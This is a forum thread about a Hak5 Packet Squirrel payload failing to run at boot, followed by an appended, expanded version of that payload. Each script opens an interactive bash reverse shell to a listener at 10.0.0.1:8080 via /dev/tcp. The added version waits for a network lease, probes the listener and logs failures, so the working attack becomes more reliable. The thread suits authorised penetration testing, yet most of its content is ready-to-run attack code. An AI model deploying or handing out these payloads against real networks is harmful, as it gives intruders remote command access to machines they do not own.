Beamboom Posted March 6, 2023

So I've finally gotten around to experimenting with the Squirrel. And I uploaded a very basic reverse shell script, just to get started. And when I run the script on the Squirrel via SSH it works as intended. But, when booting the Squirrel in the designated switch position, nothing happens? Here's the script:

```bash
#!/bin/bash
# Interactive bash with stdout/stderr sent over a TCP connection to the
# listener at 10.0.0.1:8080 (bash's built-in /dev/tcp pseudo-device) and
# stdin read back from the same socket.
/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

I don't see that there are any particular requirements regarding script content in the documentation?
Beamboom (Author) Posted March 6, 2023

7 minutes ago, dark_pyrro said: What NETMODE are you using in the payload?

Ah, interesting. I just assumed that a script that would work in Armed mode would also run in any of the switch modes. But of course, they have their own boot scripts. Duh. I added "NETMODE NAT" to the script now, with a wait (as per what I see used in the supplied payloads), but it didn't seem to make any difference? It would be really nice to have a debug mode with logging here. 🙂
dark_pyrro Posted March 6, 2023

And is it possible to access the listener IP when the payload is executing? I.e. netcat (or such) is started and listening on port 8080 on 10.0.0.1, and the "WAN" interface is up on the PS and has obtained a lease from the network. If you already have a sleep in the payload, I would probably increase it to make sure everything is established on the network side before trying to "call back" to the listener.
Beamboom (Author) Posted March 6, 2023

Yes, when I run this script on the device (via SSH in Arming mode), it works. The listener IP is accessible and the connection is established. But this script as it stands *should* work in principle, as far as you're able to tell? Then I'll play around with the wait a bit and see if that's the problem. Here's the full script as of now:

```bash
#!/bin/bash
# Packet Squirrel payload command: bring the WAN side up in NAT mode.
NETMODE NAT
# Give the network a moment to come up before calling back.
sleep 5
# Interactive bash over TCP to the listener at 10.0.0.1:8080.
/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
Beamboom (Author) Posted March 6, 2023

Now it worked, once I added a much longer wait statement! Ah man, this is a classic solution really. Thanks a lot for assisting, @dark_pyrro.
dark_pyrro Posted March 6, 2023

The PS isn't something running at rocket speed really, so it needs some time to get ready. Using some kind of sleep/delay is often a good start when troubleshooting, regardless of which (Hak5) device is involved.
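The fixed sleep that solved the thread above works, but it is a guess: too short and the call-back fires before the WAN lease exists, too long and the payload sits idle. The script below is an added example (not from the thread, and not Hak5's own code) of the same payload waiting for the network to actually be ready, and writing a log so a silent failure can be read back over SSH afterwards. Only NETMODE NAT and the listener 10.0.0.1:8080 come from the original posts; the WAN interface name (eth0), the log path, the timeouts and all helper functions are my assumptions. The payload body only runs where the NETMODE command exists, so on a laptop the file just defines the functions.

```bash
#!/bin/bash
# Added example (not from the thread or Hak5): a payload that polls for the
# network instead of guessing with a fixed sleep, and logs each step so a
# failed run can be debugged afterwards.
# Assumptions: WAN_IF, LOG and MAX_WAIT are mine; the listener 10.0.0.1:8080
# and NETMODE NAT are taken from the original post.

LHOST="${LHOST:-10.0.0.1}"
LPORT="${LPORT:-8080}"
WAN_IF="${WAN_IF:-eth0}"            # assumed: the Squirrel's WAN-side interface
LOG="${LOG:-/tmp/payload.log}"       # assumed: where the debug log is written
MAX_WAIT="${MAX_WAIT:-120}"          # seconds to wait for lease / listener

log() { printf '%s %s\n' "$(date '+%H:%M:%S')" "$*" >>"$LOG"; }

# Read `ip -4 addr show` output on stdin, print the first IPv4 address
# without its prefix length. Prints nothing if there is no inet line.
parse_ipv4() {
    sed -n 's#^[[:space:]]*inet \([0-9.]*\)/.*#\1#p' | head -n 1
}

# Poll until <iface> has an IPv4 address or <timeout> seconds pass.
# Prints the address and returns 0 on success, returns 1 on timeout.
wait_for_lease() {
    local iface=$1 timeout=$2 addr i=0
    while [ "$i" -lt "$timeout" ]; do
        addr=$(ip -4 addr show dev "$iface" 2>/dev/null | parse_ipv4)
        if [ -n "$addr" ]; then
            printf '%s\n' "$addr"
            return 0
        fi
        sleep 1
        i=$((i + 1))
    done
    return 1
}

# Poll until a TCP connect to <host>:<port> succeeds or <timeout> seconds pass.
# Each attempt uses bash's /dev/tcp in a child shell under `timeout`, so a
# single unreachable host cannot stall the payload for the TCP connect timeout.
wait_for_listener() {
    local host=$1 port=$2 timeout=$3 i=0
    while [ "$i" -lt "$timeout" ]; do
        if timeout 2 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
            return 0
        fi
        sleep 1
        i=$((i + 1))
    done
    return 1
}

# Constructed sample of `ip -4 addr show dev eth0` output, used by self_check.
SAMPLE_IP_OUTPUT='2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 state UP
    inet 192.168.1.23/24 brd 192.168.1.255 scope global dynamic eth0
       valid_lft 86052sec preferred_lft 86052sec'

# Offline sanity check of the parser; returns 0 if it extracts the sample address.
self_check() {
    [ "$(printf '%s\n' "$SAMPLE_IP_OUTPUT" | parse_ipv4)" = "192.168.1.23" ]
}

main() {
    NETMODE NAT                      # Squirrel payload command from the original post
    log "payload start: waiting for an IPv4 lease on $WAN_IF"
    local addr
    if ! addr=$(wait_for_lease "$WAN_IF" "$MAX_WAIT"); then
        log "no lease on $WAN_IF after ${MAX_WAIT}s, giving up"
        return 1
    fi
    log "got $addr on $WAN_IF; probing listener $LHOST:$LPORT"
    if ! wait_for_listener "$LHOST" "$LPORT" "$MAX_WAIT"; then
        log "listener $LHOST:$LPORT not reachable after ${MAX_WAIT}s, giving up"
        return 1
    fi
    log "listener reachable, calling back"
    /bin/bash -i >& "/dev/tcp/$LHOST/$LPORT" 0>&1
    log "shell exited with status $?"
}

# Only run the payload where the Squirrel's NETMODE command exists; elsewhere
# (e.g. when testing the helpers on a laptop) the script just defines functions.
if command -v NETMODE >/dev/null 2>&1; then
    main
fi
```

After a run that produced no shell, `cat /tmp/payload.log` over SSH in Arming mode shows whether the payload never got a lease, got one but could not reach the listener, or connected and the shell simply exited. The probe is a plain TCP connect and the shell itself is unencrypted, exactly as in the original script, so this belongs on a network you own or are authorised to test.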